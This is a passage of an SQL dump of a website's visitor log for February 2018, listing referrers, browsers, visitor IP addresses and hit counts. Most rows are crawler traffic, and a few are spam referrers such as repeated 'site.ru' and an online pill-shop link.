112','000',1,0),(22410,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',6,0),(22411,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',4,0),(22412,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.48','000',1,0),(22413,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.202','000',3,0),(22414,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',1,0),(22415,'2018-02-16','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(22416,'2018-02-16','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(22417,'2018-02-16','http://zphiblgz.org/','MSIE','Windows','11.0','','173.245.202.53','000',1,0),(22418,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',2,0),(22419,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',6,0),(22420,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(22421,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.164','000',3,0),(22422,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(22423,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(22424,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(22425,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.225','000',3,0),(22426,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',1,0),(22427,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(22428,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',3,0),(22429,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.211','000',3,0),(22430,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.74','000',1,0),(22431,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',1,0),(22432,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.73','000',1,0),(22433,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.207','000',1,0),(22434,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.112','000',1,0),(22435,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.16','000',2,0),(22436,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.212','000',1,0),(22437,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.149','000',1,0),(22438,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.230','000',2,0),(22439,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.69','000',1,0),(22440,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.113','000',1,0),(22441,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(22442,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',3,0),(22443,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',1,0),(22444,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',3,0),(22445,'2018-02-16','https://zphiblgz.org','Safari','iPhone','9.0','','106.114.62.95','000',1,0),(22446,'2018-02-16','https://zphiblgz.org','Safari','iPhone','9.0','','124.225.41.233','000',1,0),(22447,'2018-02-16','https://zphiblgz.org','Firefox','Windows','40.1','','184.74.115.186','000',2,0),(22448,'2018-02-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(22449,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',2,0),(22450,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',2,0),(22451,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',2,0),(22452,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(22453,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.211','000',1,0),(22454,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',2,0),(22455,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.145','000',2,0),(22456,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(22457,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',1,0),(22458,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',1,0),(22459,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.225','000',2,0),(22460,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.215','000',2,0),(22461,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.201','000',1,0),(22462,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(22463,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.90','000',1,0),(22464,'2018-02-16','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.51.176','000',2,0),(22465,'2018-02-16','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','172.58.184.81','000',2,0),(22466,'2018-02-16','https://www.google.com/','Safari','iPhone','602.1','','107.77.241.11','000',3,0),(22467,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','78.110.50.106','000',1,0),(22468,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',2,0),(22469,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','188.165.196.215','000',2,0),(22470,'2018-02-16','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','129.2.58.84','000',2,0),(22471,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.88','000',4,0),(22472,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.215','000',1,0),(22473,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.147','000',1,0),(22474,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',1,0),(22475,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.149','000',2,0),(22476,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',1,0),(22477,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',1,0),(22478,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',1,0),(22479,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(22480,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.201','000',3,0),(22481,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(22482,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.112','000',2,0),(22483,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.199','000',2,0),(22484,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.49','000',1,0),(22485,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.193','000',1,0),(22486,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',1,0),(22487,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',2,0),(22488,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',2,0),(22489,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',1,0),(22490,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.51','000',1,0),(22491,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.218','000',1,0),(22492,'2018-02-16','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.165.166.139','000',1,0),(22493,'2018-02-16','https://www.google.com/','Firefox','Windows','58.0','','76.80.85.162','000',3,0),(22494,'2018-02-16','https://natprof.ru/','MSIE','Windows','6.0','','178.137.162.218','000',1,0),(22495,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',2,0),(22496,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(22497,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(22498,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',1,0),(22499,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',2,0),(22500,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(22501,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(22502,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',2,0),(22503,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','95.85.21.196','000',2,0),(22504,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','167.114.46.248','000',2,0),(22505,'2018-02-16','https://zphiblgz.org','Safari','iPhone','9.0','','175.152.28.132','000',1,0),(22506,'2018-02-16','https://zphiblgz.org','Safari','iPhone','9.0','','175.152.31.137','000',1,0),(22507,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','5.61.248.2','000',3,0),(22508,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(22509,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.54','000',1,0),(22510,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',3,0),(22511,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',3,0),(22512,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',2,0),(22513,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',1,0),(22514,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(22515,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',1,0),(22516,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',1,0),(22517,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',1,0),(22518,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','185.158.165.22','000',2,0),(22519,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','94.23.218.188','000',1,0),(22520,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',2,0),(22521,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',2,0),(22522,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',2,0),(22523,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(22524,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(22525,'2018-02-16','https://zphiblgz.org/scholarship/application/?gf_token=0efdc7d693ff45a19bfec69d5a077146','Chrome','Windows','64.0.3282.167','','73.173.254.31','000',1,0),(22526,'2018-02-16','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','71.179.100.71','000',11,0),(22527,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.118','000',1,0),(22528,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(22529,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.18','000',1,0),(22530,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(22531,'2018-02-16','https://pills24h.com/buy-paroxetine-online-without-prescription/','MSIE','Windows','6.0','','178.137.178.122','000',1,0),(22532,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.116','000',4,0),(22533,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.12','000',1,0),(22534,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.22','000',1,0),(22535,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.117','000',1,0),(22536,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','89.218.18.38','000',1,0),(22537,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',3,0),(22538,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',3,0),(22539,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(22540,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(22541,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','67.227.157.7','000',1,0),(22542,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(22543,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',1,0),(22544,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.200','000',2,0),(22545,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',2,0),(22546,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(22547,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(22548,'2018-02-16','https://www.google.com/','Chrome','Android','43.0.2357.93','','96.234.236.252','000',5,0),(22549,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',1,0),(22550,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',2,0),(22551,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(22552,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.89','000',1,0),(22553,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.144','000',2,0),(22554,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.183','000',1,0),(22555,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.228','000',1,0),(22556,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.138','000',1,0),(22557,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.18','000',1,0),(22558,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(22559,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.163','000',1,0),(22560,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(22561,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.183','000',1,0),(22562,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',1,0),(22563,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.170','000',2,0),(22564,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.6','000',2,0),(22565,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.239','000',1,0),(22566,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.29','000',1,0),(22567,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.246','000',1,0),(22568,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',1,0),(22569,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',1,0),(22570,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.212','000',2,0),(22571,'2018-02-16','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(22572,'2018-02-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(22573,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',2,0),(22574,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(22575,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',1,0),(22576,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',2,0),(22577,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',1,0),(22578,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',2,0),(22579,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',3,0),(22580,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(22581,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',2,0),(22582,'2018-02-16','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.46','000',1,0),(22583,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',2,0),(22584,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(22585,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',2,0),(22586,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(22587,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(22588,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(22589,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(22590,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',2,0),(22591,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(22592,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(22593,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.23','000',1,0),(22594,'2018-02-16','https://zphiblgz.org','MSIE','Windows','8.0','','74.217.90.250','000',1,0),(22595,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',2,0),(22596,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',1,0),(22597,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',2,0),(22598,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(22599,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.119','000',2,0),(22600,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(22601,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',3,0),(22602,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',2,0),(22603,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',2,0),(22604,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',2,0),(22605,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(22606,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',3,0),(22607,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.212','000',2,0),(22608,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.135','000',1,0),(22609,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',1,0),(22610,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',1,0),(22611,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',1,0),(22612,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','176.28.9.85','000',2,0),(22613,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','202.218.119.118','000',3,0),(22614,'2018-02-17','http://msu.kharkov.ua/','MSIE','Windows','5.5','','178.137.178.122','000',1,0),(22615,'2018-02-17','http://texnika.com.ua/','Unknown','Unknown','Unknown','','46.118.116.121','000',3,0),(22616,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.36.100.174','000',1,0),(22617,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','93.174.121.91','000',1,0),(22618,'2018-02-17','https://zphiblgz.org','Chrome','Macintosh','54.0.2840.98','','128.192.4.160','000',8,0),(22619,'2018-02-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(22620,'2018-02-17','https://pills24h.com/buy-paroxetine-online-without-prescription/','Unknown','Unknown','Unknown','','178.137.162.218','000',3,0),(22621,'2018-02-17','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(22622,'2018-02-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1700.ansP4q-4F14RZK12kEha8n6Wo9kR-sDB1SuHnZYwMyRMeEKkjJafgjBcK0Txp0Me.06c5ab771d88b053ad2b90557dd68645c7579b77&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZkdRRy1xWk9BSGhBbTRnMUJqWlNVN3RkLXVyOWJndlVzU2V6VnJHNmlZVFVfc3lxRjVQbGZPYw&b64e=2&sign=6d38bda4a353d3ae4dba2e70de5d3fef&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6H0sRMCIvOdiRxdBu92EIAw7DBxvI4qpDB0zoGDe9yWfV2pA5JNQwXHh7VOejdIJv7B6DI1iZ8pHoNwjzhnBWtkKUzikdxdF9KiymzkLbTjwUjWDr9FbzmA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4bZ1oweAtumcyGxCNkI1hVvS0FwHYkdC0qnMXLkT8Ugbel7L4G0pPQtq1K3aPJSt-Q&l10n=ru&cts=1518860705142&mc=6.59817973915','MSIE','Windows','10.0','','178.140.197.249','000',1,0),(22623,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','176.9.31.154','000',1,0),(22624,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','208.113.153.217','000',2,0),(22625,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','86.57.251.26','000',1,0),(22626,'2018-02-17','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.27','000',1,0),(22627,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','213.186.119.52','000',2,0),(22628,'2018-02-17','http://rangjued.com/','MSIE','Windows','6.0','','46.118.116.121','000',7,0),(22629,'2018-02-17','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','45.55.244.134','000',18,0),(22630,'2018-02-17','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.67','000',1,0),(22631,'2018-02-17','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',2,0),(22632,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','153.92.0.8','000',2,0),(22633,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','148.251.10.141','000',2,0),(22634,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','178.20.159.183','000',2,0),(22635,'2018-02-17','https://zphiblgz.org','Firefox','Windows','40.1','','103.242.154.247','000',2,0),(22636,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','149.156.165.8','000',2,0),(22637,'2018-02-17','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(22638,'2018-02-17','https://zphiblgz.org','MSIE','Windows','11.0','','73.133.120.5','000',2,0),(22639,'2018-02-17','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(22640,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','148.251.20.87','000',2,0),(22641,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.66','000',1,0),(22642,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','178.62.141.237','000',3,0),(22643,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','178.254.50.208','000',1,0),(22644,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',3,0),(22645,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',2,0),(22646,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',2,0),(22647,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(22648,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',3,0),(22649,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.143','000',2,0),(22650,'2018-02-17','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(22651,'2018-02-17','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(22652,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.113','000',2,0),(22653,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.19','000',1,0),(22654,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.213','000',3,0),(22655,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.177','000',1,0),(22656,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.78','000',1,0),(22657,'2018-02-17','http://svetka.info/','MSIE','Windows','6.0','','178.137.16.45','000',5,0),(22658,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','87.238.192.72','000',1,0),(22659,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',5,0),(22660,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',2,0),(22661,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',3,0),(22662,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',2,0),(22663,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',2,0),(22664,'2018-02-17','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','172.56.2.201','000',3,0),(22665,'2018-02-17','https://r.search.yahoo.com/_ylt=A2KLfSmdRYhaMgsAbSBx.9w4;_ylu=X3oDMTEyZjZzZDA1BGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNDRfMQRzZWMDc3I-/RV=2/RE=1518908957/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=JnaLD0CJ0c0Aa9KcHd8wsX.8GFk-','Safari','iPhone','11.0','','174.205.10.87','000',2,0),(22666,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','67.212.240.177','000',1,0),(22667,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','37.9.169.21','000',2,0),(22668,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','213.251.182.113','000',2,0),(22669,'2018-02-17','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(22670,'2018-02-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(22671,'2018-02-17','https://www.google.com/','Chrome','Windows','63.0.3239.132','','173.120.149.151','000',4,0),(22672,'2018-02-17','https://zphiblgz.org','Firefox','Windows','58.0','','192.12.13.14','000',2,0),(22673,'2018-02-17','http://site.ru','Chrome','Windows','5.0.375.99','','139.59.106.138','000',1,0),(22674,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',1,0),(22675,'2018-02-17','https://zphiblgz.org','Unknown','Unknown','Unk